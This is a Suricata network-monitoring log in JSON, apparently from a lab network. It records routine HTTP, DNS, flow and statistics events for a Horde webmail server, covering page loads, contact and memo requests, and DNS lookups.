{"timestamp":"2020-02-29T00:19:17.000278+0000","event_type":"stats","stats":{"uptime":14809,"capture":{"kernel_packets":136693,"kernel_drops":0},"decoder":{"pkts":136697,"bytes":93881203,"invalid":192,"ipv4":135160,"ipv6":10,"ethernet":136697,"raw":0,"null":0,"sll":0,"tcp":129709,"udp":5244,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2815,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2831,"synack":2822,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1852,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2401,"failed_udp":112},"tx":{"http":4727,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2481}},"flow_mgr":{"closed_pruned":2797,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":188756,"memcap":0}}} {"timestamp":"2020-02-29T00:19:17.000992+0000","flow_id":588464974095740,"event_type":"flow","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2873,"bytes_toclient":7803,"start":"2020-02-29T00:18:06.812412+0000","end":"2020-02-29T00:18:16.581516+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:17.006111+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34882,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":23270,"tx_id":1}} {"timestamp":"2020-02-29T00:19:17.310431+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:19:17.489512+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1366,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.663401+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062}} {"timestamp":"2020-02-29T00:19:19.000177+0000","flow_id":2124693171580563,"event_type":"flow","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6579,"start":"2020-02-29T00:18:07.306835+0000","end":"2020-02-29T00:18:17.541754+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:22.667497+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34884,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19291,"tx_id":1}} {"timestamp":"2020-02-29T00:19:24.000190+0000","event_type":"stats","stats":{"uptime":14816,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20836,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} {"timestamp":"2020-02-29T00:19:29.000573+0000","flow_id":645029679087548,"event_type":"flow","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:28.540604+0000","end":"2020-02-29T00:14:28.697243+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:31.000283+0000","event_type":"stats","stats":{"uptime":14823,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20505,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} {"timestamp":"2020-02-29T00:19:35.000667+0000","flow_id":658082085123380,"event_type":"flow","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:34.701748+0000","end":"2020-02-29T00:14:34.809817+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:35.000965+0000","flow_id":959704753418051,"event_type":"flow","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.700227+0000","end":"2020-02-29T00:14:34.808864+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:36.000618+0000","flow_id":209077614025364,"event_type":"flow","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.924308+0000","end":"2020-02-29T00:14:35.033032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:37.321340+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} {"timestamp":"2020-02-29T00:19:37.452485+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:19:37.458114+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.455097+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} {"timestamp":"2020-02-29T00:19:37.458500+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} {"timestamp":"2020-02-29T00:19:37.456533+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.458990+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} {"timestamp":"2020-02-29T00:19:37.458934+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} {"timestamp":"2020-02-29T00:19:37.460469+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.460688+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} {"timestamp":"2020-02-29T00:19:37.460939+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":1}} {"timestamp":"2020-02-29T00:19:37.461204+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:19:37.479806+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":29020},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.480900+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} {"timestamp":"2020-02-29T00:19:37.561308+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:19:37.616998+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} {"timestamp":"2020-02-29T00:19:37.617541+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} {"timestamp":"2020-02-29T00:19:38.000205+0000","event_type":"stats","stats":{"uptime":14830,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19513,"memcap_state":0,"memcap_global":0},"http":{"memuse":259892,"memcap":0}}} {"timestamp":"2020-02-29T00:19:41.000397+0000","flow_id":479196697555204,"event_type":"flow","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:39.946436+0000","end":"2020-02-29T00:14:40.054421+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:42.466236+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52908,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":0}} {"timestamp":"2020-02-29T00:19:42.474814+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 